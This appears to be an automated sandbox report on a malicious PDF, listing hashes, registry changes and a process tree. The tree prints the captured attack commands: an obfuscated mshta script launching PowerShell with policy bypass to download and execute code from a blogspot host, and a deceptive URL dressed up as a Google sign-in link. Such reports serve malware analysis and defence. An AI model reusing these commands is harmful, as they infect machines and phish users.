Analysis

max time kernel: 117s
max time network: 142s
platform: windows7_x64
resource: win7-20231215-en
resource tags: arch:x64, arch:x86, image:win7-20231215-en, locale:en-us, os:windows7-x64, system
submitted: 07-02-2024 15:19
Behavioral task: behavioral1
Sample: a2e7f3210ef4f7fb06606399dd09b873715abc2ce4a45900bd2434f37d55c559.pdf
Resource: win7-20231215-en

Behavioral task: behavioral2
Sample: a2e7f3210ef4f7fb06606399dd09b873715abc2ce4a45900bd2434f37d55c559.pdf
Resource: win10v2004-20231215-en
General

Target: a2e7f3210ef4f7fb06606399dd09b873715abc2ce4a45900bd2434f37d55c559.pdf
Size: 50KB
MD5: feac523f300947e52e2e5ca44221d9d9
SHA1: ac6dc611f760b48779bded9a5e6816c91375fd2a
SHA256: a2e7f3210ef4f7fb06606399dd09b873715abc2ce4a45900bd2434f37d55c559
SHA512: 53cd297d814b2e4b99926502c49a95128c1e4ed564476c8c67f19bb0d5423889a4be60384975a2d35545fdfaf21785dc2d0c9e7828a5dfac4ed988eab11ff332
SSDEEP: 384:86SDvX7hWFcTPm/K7Uzzzzzzzzzzzzzzzzz3SkYTZvL:86ST7hWGTO/KQ8ZvL
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies Internet Explorer settings
Processes: IEXPLORE.EXE, iexplore.exe, mshta.exe

description | ioc | process
Key created | \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main | IEXPLORE.EXE
Key created | \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\PageSetup | iexplore.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{64E259A1-C5CC-11EE-88F9-76B33C18F4CF} = "0" | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\LowRegistry | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\IntelliForms | iexplore.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | iexplore.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | iexplore.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | iexplore.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "413481084" | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\InternetRegistry | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | iexplore.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | iexplore.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main | mshta.exe
Key created | \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\SearchScopes | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Zoom | iexplore.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\GPU | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | iexplore.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Toolbar | iexplore.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes: powershell.exe

pid | process
2832 | powershell.exe
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes: AcroRd32.exe

pid | process
2220 | AcroRd32.exe
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes: powershell.exe

description | pid | process
Token: SeDebugPrivilege | 2832 | powershell.exe
-
Suspicious use of FindShellTrayWindow 1 IoCs
Processes: iexplore.exe

pid | process
2704 | iexplore.exe
-
Suspicious use of SetWindowsHookEx 9 IoCs
Processes: AcroRd32.exe, iexplore.exe, IEXPLORE.EXE

pid | process
2220 | AcroRd32.exe
2220 | AcroRd32.exe
2220 | AcroRd32.exe
2704 | iexplore.exe
2704 | iexplore.exe
2952 | IEXPLORE.EXE
2952 | IEXPLORE.EXE
2952 | IEXPLORE.EXE
2952 | IEXPLORE.EXE
-
Suspicious use of WriteProcessMemory 16 IoCs
Processes: AcroRd32.exe, mshta.exe, iexplore.exe

description | pid | process | target process
PID 2220 wrote to memory of 2380 | 2220 | AcroRd32.exe | mshta.exe
PID 2220 wrote to memory of 2380 | 2220 | AcroRd32.exe | mshta.exe
PID 2220 wrote to memory of 2380 | 2220 | AcroRd32.exe | mshta.exe
PID 2220 wrote to memory of 2380 | 2220 | AcroRd32.exe | mshta.exe
PID 2220 wrote to memory of 2704 | 2220 | AcroRd32.exe | iexplore.exe
PID 2220 wrote to memory of 2704 | 2220 | AcroRd32.exe | iexplore.exe
PID 2220 wrote to memory of 2704 | 2220 | AcroRd32.exe | iexplore.exe
PID 2220 wrote to memory of 2704 | 2220 | AcroRd32.exe | iexplore.exe
PID 2380 wrote to memory of 2832 | 2380 | mshta.exe | powershell.exe
PID 2380 wrote to memory of 2832 | 2380 | mshta.exe | powershell.exe
PID 2380 wrote to memory of 2832 | 2380 | mshta.exe | powershell.exe
PID 2380 wrote to memory of 2832 | 2380 | mshta.exe | powershell.exe
PID 2704 wrote to memory of 2952 | 2704 | iexplore.exe | IEXPLORE.EXE
PID 2704 wrote to memory of 2952 | 2704 | iexplore.exe | IEXPLORE.EXE
PID 2704 wrote to memory of 2952 | 2704 | iexplore.exe | IEXPLORE.EXE
PID 2704 wrote to memory of 2952 | 2704 | iexplore.exe | IEXPLORE.EXE
Processes

Process tree (indentation shows parent/child depth):

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
  Command line: "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\a2e7f3210ef4f7fb06606399dd09b873715abc2ce4a45900bd2434f37d55c559.pdf"
  PID: 2220
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\mshta.exe
      Command line: "C:\Windows\System32\mshta.exe" "javascript:_r°0=['Scripting.FileSystemObject','WScript.Shell','powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm htlfeb24.blogspot.com//////////////////////////////atom.xml | iex);Start-Sleep -Seconds 5;','run']; x°x=[_r°0[3],_r°0[0],_r°0[1],_r°0[2]]; new ActiveXObject(x°x[2])[x°x[0]](x°x[3], 0, true);close();new ActiveXObject(x°x[1]).DeleteFile(WScript.ScriptFullName);"
      PID: 2380
      - Modifies Internet Explorer settings
      - Suspicious use of WriteProcessMemory

        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm htlfeb24.blogspot.com//////////////////////////////atom.xml | iex);Start-Sleep -Seconds 5;
          PID: 2832
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken

    C:\Program Files\Internet Explorer\iexplore.exe
      Command line: "C:\Program Files\Internet Explorer\iexplore.exe" https://accounts.google.com+signin%3Dsecure+v2+identifier%[email protected]////////atom.xml?http://www.booking.com
      PID: 2704
      - Modifies Internet Explorer settings
      - Suspicious use of FindShellTrayWindow
      - Suspicious use of SetWindowsHookEx
      - Suspicious use of WriteProcessMemory

        C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          Command line: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2704 CREDAT:275457 /prefetch:2
          PID: 2952
          - Modifies Internet Explorer settings
          - Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Enterprise v15
Downloads